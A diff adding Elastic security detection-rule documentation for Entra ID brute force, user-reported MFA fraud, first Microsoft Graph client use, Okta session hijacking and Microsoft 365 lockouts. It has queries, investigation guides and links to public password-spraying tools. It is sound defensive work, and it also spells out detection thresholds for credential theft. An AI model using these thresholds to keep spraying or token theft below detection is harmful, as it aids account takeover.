TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Use Alternate Authentication Material +** ID: T1550 +** Reference URL: https://attack.mitre.org/techniques/T1550/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-sign-in-brute-force-activity.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-sign-in-brute-force-activity.asciidoc new file mode 100644 index 0000000000..5e468c6886 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-sign-in-brute-force-activity.asciidoc @@ -0,0 +1,265 @@ +[[prebuilt-rule-8-19-8-microsoft-entra-id-sign-in-brute-force-activity]] +=== Microsoft Entra ID Sign-In Brute Force Activity + +Identifies potential brute-force attacks targeting user accounts by analyzing failed sign-in patterns in Microsoft Entra ID Sign-In Logs. This detection focuses on a high volume of failed interactive or non-interactive authentication attempts within a short time window, often indicative of password spraying, credential stuffing, or password guessing. Adversaries may use these techniques to gain unauthorized access to applications integrated with Entra ID or to compromise valid user accounts. 
+ +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 15m + +*Searches indices from*: now-60m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.proofpoint.com/us/blog/threat-insight/attackers-unleash-teamfiltration-account-takeover-campaign +* https://www.microsoft.com/en-us/security/blog/2025/05/27/new-russia-affiliated-actor-void-blizzard-targets-critical-sectors-for-espionage/ +* https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying +* https://learn.microsoft.com/en-us/security/operations/incident-response-playbook-password-spray +* https://learn.microsoft.com/en-us/purview/audit-log-detailed-properties +* https://securityscorecard.com/research/massive-botnet-targets-m365-with-stealthy-password-spraying-attacks/ +* https://learn.microsoft.com/en-us/entra/identity-platform/reference-error-codes +* https://github.com/0xZDH/Omnispray +* https://github.com/0xZDH/o365spray + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Data Source: Azure +* Data Source: Entra ID +* Data Source: Entra ID Sign-in Logs +* Use Case: Identity and Access Audit +* Use Case: Threat Detection +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Microsoft Entra ID Sign-In Brute Force Activity* + + +This rule detects brute-force authentication activity in Entra ID sign-in logs. It classifies failed sign-in attempts into behavior types such as password spraying, credential stuffing, or password guessing. The classification (`bf_type`) helps prioritize triage and incident response. + + +*Possible investigation steps* + + +- Review `bf_type`: Determines the brute-force technique being used (`password_spraying`, `credential_stuffing`, or `password_guessing`). +- Examine `user_id_list`: Identify if high-value accounts (e.g., administrators, service principals, federated identities) are being targeted. +- Review `login_errors`: Repetitive error types like `"Invalid Grant"` or `"User Not Found"` suggest automated attacks. +- Check `ip_list` and `source_orgs`: Investigate if the activity originates from suspicious infrastructure (VPNs, hosting providers, etc.). +- Validate `unique_ips` and `countries`: Geographic diversity and IP volume may indicate distributed or botnet-based attacks. +- Compare `total_attempts` vs `duration_seconds`: High rate of failures in a short time period implies automation. +- Analyze `user_agent.original` and `device_detail_browser`: User agents like `curl`, `Python`, or generic libraries may indicate scripting tools. +- Investigate `client_app_display_name` and `incoming_token_type`: Detect potential abuse of legacy or unattended login mechanisms. +- Inspect `target_resource_display_name`: Understand what application or resource the attacker is trying to access. +- Pivot using `session_id` and `device_detail_device_id`: Determine if a device is targeting multiple accounts. +- Review `conditional_access_status`: If not enforced, ensure Conditional Access policies are scoped correctly. + + +*False positive analysis* + + +- Legitimate automation (e.g., misconfigured scripts, sync processes) can trigger repeated failures. +- Internal red team activity or penetration tests may mimic brute-force behaviors. 
+- Certain service accounts or mobile clients may generate repetitive sign-in noise if not properly configured. + + +*Response and remediation* + + +- Notify your identity security team for further analysis. +- Investigate and lock or reset impacted accounts if compromise is suspected. +- Block offending IPs or ASNs at the firewall, proxy, or using Conditional Access. +- Confirm MFA and Conditional Access are enforced for all user types. +- Audit targeted accounts for credential reuse across services. +- Implement account lockout or throttling for failed sign-in attempts where possible. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-azure.signinlogs-* + +// Define a time window for grouping and maintain the original event timestamp +| eval Esql.time_window_date_trunc = date_trunc(15 minutes, @timestamp) + +// Filter relevant failed authentication events with specific error codes +| where event.dataset == "azure.signinlogs" + and event.category == "authentication" + and azure.signinlogs.category in ("NonInteractiveUserSignInLogs", "SignInLogs") + and event.outcome == "failure" + and azure.signinlogs.properties.authentication_requirement == "singleFactorAuthentication" + and azure.signinlogs.properties.status.error_code in ( + 50034, // UserAccountNotFound + 50126, // InvalidUsernameOrPassword + 50055, // PasswordExpired + 50056, // InvalidPassword + 50057, // UserDisabled + 50064, // CredentialValidationFailure + 50076, // MFARequiredButNotPassed + 50079, // MFARegistrationRequired + 50105, // EntitlementGrantsNotFound + 70000, // InvalidGrant + 70008, // ExpiredOrRevokedRefreshToken + 70043, // BadTokenDueToSignInFrequency + 80002, // OnPremisePasswordValidatorRequestTimedOut + 80005, // OnPremisePasswordValidatorUnpredictableWebException + 50144, // InvalidPasswordExpiredOnPremPassword + 50135, // PasswordChangeCompromisedPassword + 50142, // PasswordChangeRequiredConditionalAccess + 120000, // PasswordChangeIncorrectCurrentPassword + 120002, // PasswordChangeInvalidNewPasswordWeak + 120020 // PasswordChangeFailure + ) + and azure.signinlogs.properties.user_principal_name is not null and azure.signinlogs.properties.user_principal_name != "" + and user_agent.original != "Mozilla/5.0 (compatible; MSAL 1.0) PKeyAuth/1.0" + and source.`as`.organization.name != "MICROSOFT-CORP-MSN-as-BLOCK" + +| stats + Esql.azure_signinlogs_properties_authentication_requirement_values = values(azure.signinlogs.properties.authentication_requirement), + Esql.azure_signinlogs_properties_app_id_values = values(azure.signinlogs.properties.app_id), + Esql.azure_signinlogs_properties_app_display_name_values = values(azure.signinlogs.properties.app_display_name), + Esql.azure_signinlogs_properties_resource_id_values = values(azure.signinlogs.properties.resource_id), + Esql.azure_signinlogs_properties_resource_display_name_values = values(azure.signinlogs.properties.resource_display_name), + Esql.azure_signinlogs_properties_conditional_access_status_values = values(azure.signinlogs.properties.conditional_access_status), + Esql.azure_signinlogs_properties_device_detail_browser_values = values(azure.signinlogs.properties.device_detail.browser), + Esql.azure_signinlogs_properties_device_detail_device_id_values = values(azure.signinlogs.properties.device_detail.device_id), + Esql.azure_signinlogs_properties_device_detail_operating_system_values = values(azure.signinlogs.properties.device_detail.operating_system), + Esql.azure_signinlogs_properties_incoming_token_type_values = 
values(azure.signinlogs.properties.incoming_token_type), + Esql.azure_signinlogs_properties_risk_state_values = values(azure.signinlogs.properties.risk_state), + Esql.azure_signinlogs_properties_session_id_values = values(azure.signinlogs.properties.session_id), + Esql.azure_signinlogs_properties_user_id_values = values(azure.signinlogs.properties.user_id), + Esql_priv.azure_signinlogs_properties_user_principal_name_values = values(azure.signinlogs.properties.user_principal_name), + Esql.azure_signinlogs_result_description_values = values(azure.signinlogs.result_description), + Esql.azure_signinlogs_result_signature_values = values(azure.signinlogs.result_signature), + Esql.azure_signinlogs_result_type_values = values(azure.signinlogs.result_type), + + Esql.azure_signinlogs_properties_user_id_count_distinct = count_distinct(azure.signinlogs.properties.user_id), + Esql.azure_signinlogs_properties_user_id_list = values(azure.signinlogs.properties.user_id), + Esql.azure_signinlogs_result_description_values_all = values(azure.signinlogs.result_description), + Esql.azure_signinlogs_result_description_count_distinct = count_distinct(azure.signinlogs.result_description), + Esql.azure_signinlogs_properties_status_error_code_values = values(azure.signinlogs.properties.status.error_code), + Esql.azure_signinlogs_properties_status_error_code_count_distinct = count_distinct(azure.signinlogs.properties.status.error_code), + Esql.azure_signinlogs_properties_incoming_token_type_values_all = values(azure.signinlogs.properties.incoming_token_type), + Esql.azure_signinlogs_properties_app_display_name_values_all = values(azure.signinlogs.properties.app_display_name), + Esql.source_ip_values = values(source.ip), + Esql.source_ip_count_distinct = count_distinct(source.ip), + Esql.source_as_organization_name_values = values(source.`as`.organization.name), + Esql.source_geo_country_name_values = values(source.geo.country_name), + Esql.source_geo_country_name_count_distinct = count_distinct(source.geo.country_name), + Esql.source_as_organization_name_count_distinct = count_distinct(source.`as`.organization.name), + Esql.timestamp_first_seen = min(@timestamp), + Esql.timestamp_last_seen = max(@timestamp), + Esql.event_count = count() +by Esql.time_window_date_trunc + +| eval + Esql.duration_seconds = date_diff("seconds", Esql.timestamp_first_seen, Esql.timestamp_last_seen), + Esql.brute_force_type = case( + Esql.azure_signinlogs_properties_user_id_count_distinct >= 10 and Esql.event_count >= 30 and Esql.azure_signinlogs_result_description_count_distinct <= 3 + and Esql.source_ip_count_distinct >= 5 + and Esql.duration_seconds <= 600 + and Esql.azure_signinlogs_properties_user_id_count_distinct > Esql.source_ip_count_distinct, + "credential_stuffing", + + Esql.azure_signinlogs_properties_user_id_count_distinct >= 15 and Esql.azure_signinlogs_result_description_count_distinct == 1 and Esql.event_count >= 15 and Esql.duration_seconds <= 1800, + "password_spraying", + + (Esql.azure_signinlogs_properties_user_id_count_distinct == 1 and Esql.azure_signinlogs_result_description_count_distinct == 1 and Esql.event_count >= 30 and Esql.duration_seconds <= 300) + or (Esql.azure_signinlogs_properties_user_id_count_distinct <= 3 and Esql.source_ip_count_distinct > 30 and Esql.event_count >= 100), + "password_guessing", + + "other" + ) + +| keep + Esql.time_window_date_trunc, + Esql.brute_force_type, + Esql.duration_seconds, + Esql.event_count, + Esql.timestamp_first_seen, + Esql.timestamp_last_seen, + 
Esql.azure_signinlogs_properties_user_id_count_distinct, + Esql.azure_signinlogs_properties_user_id_list, + Esql.azure_signinlogs_result_description_values_all, + Esql.azure_signinlogs_result_description_count_distinct, + Esql.azure_signinlogs_properties_status_error_code_count_distinct, + Esql.azure_signinlogs_properties_status_error_code_values, + Esql.azure_signinlogs_properties_incoming_token_type_values_all, + Esql.azure_signinlogs_properties_app_display_name_values_all, + Esql.source_ip_values, + Esql.source_ip_count_distinct, + Esql.source_as_organization_name_values, + Esql.source_geo_country_name_values, + Esql.source_geo_country_name_count_distinct, + Esql.source_as_organization_name_count_distinct, + Esql.azure_signinlogs_properties_authentication_requirement_values, + Esql.azure_signinlogs_properties_app_id_values, + Esql.azure_signinlogs_properties_app_display_name_values, + Esql.azure_signinlogs_properties_resource_id_values, + Esql.azure_signinlogs_properties_resource_display_name_values, + Esql.azure_signinlogs_properties_conditional_access_status_values, + Esql.azure_signinlogs_properties_device_detail_browser_values, + Esql.azure_signinlogs_properties_device_detail_device_id_values, + Esql.azure_signinlogs_properties_device_detail_operating_system_values, + Esql.azure_signinlogs_properties_incoming_token_type_values, + Esql.azure_signinlogs_properties_risk_state_values, + Esql.azure_signinlogs_properties_session_id_values, + Esql.azure_signinlogs_properties_user_id_values, + Esql_priv.azure_signinlogs_properties_user_principal_name_values, + Esql.azure_signinlogs_result_description_values, + Esql.azure_signinlogs_result_signature_values, + Esql.azure_signinlogs_result_type_values + +| where Esql.brute_force_type != "other" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Guessing +** ID: T1110.001 +** Reference URL: https://attack.mitre.org/techniques/T1110/001/ +* Sub-technique: +** Name: Password Spraying +** ID: T1110.003 +** Reference URL: https://attack.mitre.org/techniques/T1110/003/ +* Sub-technique: +** Name: Credential Stuffing +** ID: T1110.004 +** Reference URL: https://attack.mitre.org/techniques/T1110/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-user-reported-suspicious-activity.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-user-reported-suspicious-activity.asciidoc new file mode 100644 index 0000000000..6b1168a6e3 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-user-reported-suspicious-activity.asciidoc @@ -0,0 +1,123 @@ +[[prebuilt-rule-8-19-8-microsoft-entra-id-user-reported-suspicious-activity]] +=== Microsoft Entra ID User Reported Suspicious Activity + +Identifies suspicious activity reported by users in Microsoft Entra ID where users have reported suspicious activity related to their accounts, which may indicate potential compromise or unauthorized access attempts. 
Reported suspicious activity typically occurs during the authentication process and may involve various authentication methods, such as password resets, account recovery, or multi-factor authentication challenges. Adversaries may attempt to exploit user accounts by leveraging social engineering techniques or other methods to gain unauthorized access to sensitive information or resources. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.auditlogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://chris-brumm.medium.com/microsoft-entra-mfa-fraud-deep-dive-7764fd8f76ad +* https://janbakker.tech/report-suspicious-activity-fraud-alert-for-azure-mfa/ + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Audit Logs +* Use Case: Identity and Access Audit +* Resources: Investigation Guide +* Tactic: Initial Access + +*Version*: 3 + +*Rule authors*: + +* Elastic +* Willem D'Haese + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and Analysis* + + + +*Investigating Microsoft Entra ID User Reported Suspicious Activity* + + +This rule detects when a user in Microsoft Entra ID reports suspicious activity associated with their account. This feature is often used to report MFA fatigue or unsolicited push notifications, and is logged during authentication flows involving methods like Microsoft Authenticator. Such events may indicate that an attacker attempted unauthorized access and triggered a push that was denied or flagged by the user. + + +*Possible investigation steps* + + +- Review the `azure.auditlogs.identity` field to identify the reporting user. +- Confirm that `event.action` is `"Suspicious activity reported"` and the result was `"success"`. +- Check the `azure.auditlogs.properties.additional_details` array for `AuthenticationMethod`, which shows how the login attempt was performed (e.g., `PhoneAppNotification`). +- Look at the `azure.auditlogs.properties.initiated_by.user.userPrincipalName` and `displayName` to confirm which user reported the suspicious activity. +- Investigate recent sign-in activity (`signinlogs`) for the same user. Focus on: + - IP address geolocation and ASN. + - Device, operating system, and browser. + - MFA prompt patterns or unusual login attempts. +- Determine whether the user actually initiated a login attempt, or if it was unexpected and aligns with MFA fatigue or phishing attempts. +- Correlate this report with any risky sign-in detections, conditional access blocks, or password resets in the past 24–48 hours. + + +*False positive analysis* + + +- Users unfamiliar with MFA push notifications may mistakenly report legitimate sign-in attempts. +- Shared accounts or device switching can also trigger unintended notifications. +- Legitimate travel or network changes might confuse users into thinking activity was malicious. + + +*Response and remediation* + + +- Contact the user to validate the suspicious activity report and assess whether they were targeted or tricked by a malicious actor. +- If the report is confirmed to be valid: + - Reset the user’s credentials immediately. + - Revoke active sessions and refresh tokens. + - Review their activity across Microsoft 365 services for signs of compromise. 
+- If other users report similar behavior around the same time, assess for a broader MFA fatigue campaign or targeted phishing. +- Consider tuning conditional access policies to require number matching or stronger MFA mechanisms. +- Educate users on reporting suspicious MFA prompts and following up with IT/security teams promptly. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "azure.auditlogs" + and azure.auditlogs.operation_name: "Suspicious activity reported" + and azure.auditlogs.properties.additional_details.key: "AuthenticationMethod" + and azure.auditlogs.properties.target_resources.*.type: "User" + and event.outcome: "success" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-graph-first-occurrence-of-client-request.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-graph-first-occurrence-of-client-request.asciidoc new file mode 100644 index 0000000000..75d4233396 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-graph-first-occurrence-of-client-request.asciidoc @@ -0,0 +1,133 @@ +[[prebuilt-rule-8-19-8-microsoft-graph-first-occurrence-of-client-request]] +=== Microsoft Graph First Occurrence of Client Request + +This New Terms rule focuses on the first occurrence of a client application ID (azure.graphactivitylogs.properties.app_id) making a request to the Microsoft Graph API for a specific tenant ID (azure.tenant_id) and user principal object ID (azure.graphactivitylogs.properties.user_principal_object_id). This rule may help identify unauthorized access or actions performed by compromised accounts. Adversaries may successfully compromise a user's credentials and use the Microsoft Graph API to access resources or perform actions on behalf of the user. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-azure.graphactivitylogs-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/ + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Data Source: Microsoft Graph +* Data Source: Microsoft Graph Activity Logs +* Resources: Investigation Guide +* Use Case: Identity and Access Audit +* Tactic: Initial Access + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Microsoft Graph First Occurrence of Client Request* + + +This rule detects the first observed occurrence of a Microsoft Graph API request by a specific client application ID (`azure.graphactivitylogs.properties.app_id`) in combination with a user principal object ID (`azure.graphactivitylogs.properties.user_principal_object_id`) and tenant ID (`azure.tenant_id`) within the last 14 days.
This may indicate unauthorized access following a successful phishing attempt, token theft, or abuse of OAuth workflows. + +Adversaries frequently exploit legitimate Microsoft or third-party application IDs to avoid raising suspicion during initial access. By using pre-consented or trusted apps to interact with Microsoft Graph, attackers can perform actions on behalf of users without triggering conventional authentication alerts or requiring additional user interaction. + + +*Possible investigation steps* + + +- Review `azure.graphactivitylogs.properties.user_principal_object_id` and correlate with recent sign-in logs for the associated user. +- Determine whether `azure.graphactivitylogs.properties.app_id` is a known and approved application in your environment. +- Investigate the `user_agent.original` field for signs of scripted access (e.g., automation tools or libraries). +- Check the source IP address (`source.ip`) and geolocation data (`source.geo.*`) for unfamiliar origins. +- Inspect `azure.graphactivitylogs.properties.scopes` to understand the level of access being requested by the app. +- Examine any follow-up Graph API activity from the same `app_id` or `user_principal_object_id` for signs of data access or exfiltration. +- Correlate with device or session ID fields (`azure.graphactivitylogs.properties.c_sid`, if present) to detect persistent or repeat activity. + + +*False positive analysis* + + +- First-time use of a legitimate Microsoft or enterprise-approved application. +- Developer or automation workflows initiating new Graph API requests. +- Valid end-user activity following device reconfiguration or new client installation. +- Maintain an allowlist of expected `app_id` values and known developer tools. +- Suppress detections from known good `user_agent.original` strings or approved source IP ranges. +- Use device and identity telemetry to distinguish trusted vs. unknown activity sources. +- Combine with session risk or sign-in anomaly signals where available. + + +*Response and remediation* + + +- Reach out to the user and verify whether they authorized the application access. +- Revoke active OAuth tokens and reset credentials if unauthorized use is confirmed. +- Search for additional Graph API calls made by the same `app_id` or `user_principal_object_id`. +- Investigate whether sensitive resources (mail, files, Teams, contacts) were accessed. +- Apply Conditional Access policies to limit Graph API access by app type, IP, or device state. +- Restrict user consent for third-party apps and enforce admin approval workflows. +- Monitor usage of new or uncommon `app_id` values across your tenant. +- Provide user education on OAuth phishing tactics and reporting suspicious prompts. 
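+
+To support the pivoting steps above (searching for additional Graph API calls by the same `app_id` or `user_principal_object_id`), the following illustrative ES|QL sketch can be run over the same indices; the application ID and object ID values are placeholders to replace with values from the alert:
+
+[source, js]
+----------------------------------
+// Illustrative pivot query, not part of the rule itself
+from logs-azure.graphactivitylogs-*
+| where event.dataset == "azure.graphactivitylogs"
+    // placeholders: substitute the app_id and user_principal_object_id from the alert
+    and azure.graphactivitylogs.properties.app_id == "00000000-0000-0000-0000-000000000000"
+    and azure.graphactivitylogs.properties.user_principal_object_id == "11111111-1111-1111-1111-111111111111"
+| stats Esql.event_count = count(*),
+        Esql.source_ip_values = values(source.ip),
+        Esql.user_agent_values = values(user_agent.original),
+        Esql.scopes_values = values(azure.graphactivitylogs.properties.scopes),
+        Esql.timestamp_first_seen = min(@timestamp),
+        Esql.timestamp_last_seen = max(@timestamp)
+    by azure.tenant_id
+----------------------------------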
+ + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "azure.graphactivitylogs" + and event.type: "access" + and azure.graphactivitylogs.properties.c_idtyp: "user" + and azure.graphactivitylogs.properties.client_auth_method: 0 + and http.response.status_code: 200 + and url.domain: "graph.microsoft.com" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-multiple-device-token-hashes-for-single-okta-session.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-multiple-device-token-hashes-for-single-okta-session.asciidoc new file mode 100644 index 0000000000..e1f7877466 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-multiple-device-token-hashes-for-single-okta-session.asciidoc @@ -0,0 +1,148 @@ +[[prebuilt-rule-8-19-8-multiple-device-token-hashes-for-single-okta-session]] +=== Multiple Device Token Hashes for Single Okta Session + +This rule detects when a specific Okta actor has multiple device token hashes for a single Okta session. This may indicate an authenticated session has been hijacked or is being used by multiple devices. Adversaries may hijack a session to gain unauthorized access to Okta admin console, applications, tenants, or other resources. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://developer.okta.com/docs/reference/api/system-log/ +* https://developer.okta.com/docs/reference/api/event-types/ +* https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy +* https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection +* https://support.okta.com/help/s/article/session-hijacking-attack-definition-damage-defense?language=en_US +* https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security +* https://www.elastic.co/security-labs/starter-guide-to-understanding-okta + +*Tags*: + +* Use Case: Identity and Access Audit +* Data Source: Okta +* Tactic: Credential Access +* Domain: SaaS +* Resources: Investigation Guide + +*Version*: 308 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Multiple Device Token Hashes for Single Okta Session* + + +This rule detects when a specific Okta actor has multiple device token hashes for a single Okta session. This may indicate an authenticated session has been hijacked or is being used by multiple devices. 
Adversaries may hijack a session to gain unauthorized access to Okta admin console, applications, tenants, or other resources. + + +*Possible investigation steps:* + +- Since this is an ESQL rule, the `okta.actor.alternate_id` and `okta.authentication_context.external_session_id` values can be used to pivot into the raw authentication events related to this alert. +- Identify the users involved in this action by examining the `okta.actor.id`, `okta.actor.type`, `okta.actor.alternate_id`, and `okta.actor.display_name` fields. +- Determine the device client used for these actions by analyzing `okta.client.ip`, `okta.client.user_agent.raw_user_agent`, `okta.client.zone`, `okta.client.device`, and `okta.client.id` fields. +- With Okta end users identified, review the `okta.debug_context.debug_data.dt_hash` field. + - Historical analysis should indicate if this device token hash is commonly associated with the user. +- Review the `okta.event_type` field to determine the type of authentication event that occurred. + - Authentication events have been filtered out to focus on Okta activity via established sessions. +- Review the past activities of the actor(s) involved in this action by checking their previous actions. +- Evaluate the actions that happened just before and after this event in the `okta.event_type` field to help understand the full context of the activity. + - This may help determine the authentication and authorization actions that occurred between the user, Okta and application. +- Aggregate by `okta.actor.alternate_id` and `event.action` to determine the type of actions that are being performed by the actor(s) involved in this action. + - If various activity is reported that seems to indicate actions from separate users, consider deactivating the user's account temporarily. + + +*False positive analysis:* + +- It is very rare that a legitimate user would have multiple device token hashes for a single Okta session as DT hashes do not change after an authenticated session is established. + + +*Response and remediation:* + +- Consider stopping all sessions for the user(s) involved in this action. +- If this does not appear to be a false positive, consider resetting passwords for the users involved and enabling multi-factor authentication (MFA). + - If MFA is already enabled, consider resetting MFA for the users. +- If any of the users are not legitimate, consider deactivating the user's account. +- Conduct a review of Okta policies and ensure they are in accordance with security best practices. +- Check with internal IT teams to determine if the accounts involved recently had MFA reset at the request of the user. + - If so, confirm with the user this was a legitimate request. + - If so and this was not a legitimate request, consider deactivating the user's account temporarily. + - Reset passwords and reset MFA for the user. +- Alternatively adding `okta.client.ip` or a CIDR range to the `exceptions` list can prevent future occurrences of this event from triggering the rule. + - This should be done with caution as it may prevent legitimate alerts from being generated. + + +==== Setup + + + +*Setup* + + +The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. 
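+
+The session pivot described in the investigation steps above can be approximated with an illustrative ES|QL hunting query such as the following; the actor and session values are placeholders to replace with values from the alert, and this query is separate from the rule query shown below:
+
+[source, js]
+----------------------------------
+// Illustrative triage pivot, not part of the rule itself
+from logs-okta*
+| where event.dataset == "okta.system"
+    // placeholders: substitute the actor and session identifiers from the alert
+    and okta.actor.alternate_id == "user@example.com"
+    and okta.authentication_context.external_session_id == "session-id-from-alert"
+| stats Esql.event_count = count(*),
+        Esql.okta_client_ip_values = values(okta.client.ip),
+        Esql.okta_client_user_agent_values = values(okta.client.user_agent.raw_user_agent)
+    by okta.debug_context.debug_data.dt_hash, event.action
+| sort Esql.event_count desc
+----------------------------------
+
+If the distinct `okta.debug_context.debug_data.dt_hash` values map to clearly different client IPs and user agents, session hijacking becomes more likely than a benign device change.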
+ +==== Rule query + + +[source, js] +---------------------------------- +from logs-okta* +| where + event.dataset == "okta.system" and + not event.action in ( + "policy.evaluate_sign_on", + "user.session.start", + "user.authentication.sso" + ) and + okta.actor.alternate_id != "system@okta.com" and + okta.actor.alternate_id rlike "[^@\\s]+\\@[^@\\s]+" and + okta.authentication_context.external_session_id != "unknown" +| keep + event.action, + okta.actor.alternate_id, + okta.authentication_context.external_session_id, + okta.debug_context.debug_data.dt_hash +| stats + Esql.okta_debug_context_debug_data_dt_hash_count_distinct = count_distinct(okta.debug_context.debug_data.dt_hash) + by + okta.actor.alternate_id, + okta.authentication_context.external_session_id +| where + Esql.okta_debug_context_debug_data_dt_hash_count_distinct >= 2 +| sort + Esql.okta_debug_context_debug_data_dt_hash_count_distinct desc + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Web Session Cookie +** ID: T1539 +** Reference URL: https://attack.mitre.org/techniques/T1539/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-multiple-microsoft-365-user-account-lockouts-in-short-time-window.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-multiple-microsoft-365-user-account-lockouts-in-short-time-window.asciidoc new file mode 100644 index 0000000000..5e61386f1d --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-multiple-microsoft-365-user-account-lockouts-in-short-time-window.asciidoc @@ -0,0 +1,174 @@ +[[prebuilt-rule-8-19-8-multiple-microsoft-365-user-account-lockouts-in-short-time-window]] +=== Multiple Microsoft 365 User Account Lockouts in Short Time Window + +Detects a burst of Microsoft 365 user account lockouts within a short 5-minute window. A high number of IdsLocked login errors across multiple user accounts may indicate brute-force attempts for the same users resulting in lockouts. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 8m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://learn.microsoft.com/en-us/security/operations/incident-response-playbook-password-spray +* https://learn.microsoft.com/en-us/purview/audit-log-detailed-properties +* https://securityscorecard.com/research/massive-botnet-targets-m365-with-stealthy-password-spraying-attacks/ +* https://github.com/0xZDH/Omnispray +* https://github.com/0xZDH/o365spray + +*Tags*: + +* Domain: Cloud +* Domain: SaaS +* Data Source: Microsoft 365 +* Data Source: Microsoft 365 Audit Logs +* Use Case: Threat Detection +* Use Case: Identity and Access Audit +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and Analysis* + + + +*Investigating Multiple Microsoft 365 User Account Lockouts in Short Time Window* + + 